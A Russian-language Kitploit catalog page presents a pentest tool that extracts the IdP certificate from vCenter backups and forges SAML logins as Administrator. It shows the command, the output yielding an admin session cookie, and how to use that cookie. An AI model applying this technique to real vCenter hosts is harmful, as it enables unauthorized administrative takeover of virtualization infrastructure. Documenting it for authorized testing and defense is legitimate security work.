Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/horizon3ai/vcenter_saml_login
Аутентификация и авторизацияБезопасность облачной инфраструктурыПовышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubhorizon3ai/vcenter_saml_login

vcenter_saml_login

Инструмент для извлечения сертификата IdP из резервных копий vCenter и входа в систему как Administrator

Репозиторий
52995733 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

vCenter SAML Login Tool

Инструмент для извлечения сертификата поставщика удостоверений (IdP) из резервных копий vCenter и входа в систему в качестве Administrator

Предыстория

Обычно во время пентестов мы получаем доступ к резервным копиям vCenter на файловом сервере или получаем root-доступ к хосту VCSA через недавние CVE. Вход в vCenter vSphere UI позволяет нам легко получить доступ к другим системам и конфиденциальной информации, а также продемонстрировать заказчикам влияние этих находок.

Файл data.mdb содержит сертификаты и может быть найден в резервных копиях vCenter, а также на хосте VCSA при наличии root-прав. Эти сертификаты хранятся в открытом виде (cleartext) и могут использоваться для подписи любого запроса аутентификации SAML для любого пользователя — включая встроенную учётную запись Administrator.

Если вы хотите узнать больше о различных сценариях использования этого инструмента и о том, как мы использовали его для получения административного доступа к хостам vCenter, ознакомьтесь с нашим постом в блоге: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/

Использование

root@kitploit:~
root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640

Используя указанный выше cookie, откройте экземпляр VCSA по адресу https://<VCSA>/ui, добавьте cookie для пути /ui и снова перейдите по адресу https://<VCSA>/ui.

Демонстрация

Отказ от ответственности

Это программное обеспечение создано исключительно для академических исследований и разработки эффективных защитных методов и не предназначено для использования для атак на системы, кроме случаев явного разрешения. Сопровождающие проекта не несут ответственности за неправомерное использование данного программного обеспечения. Используйте ответственно.

Скачать инструмент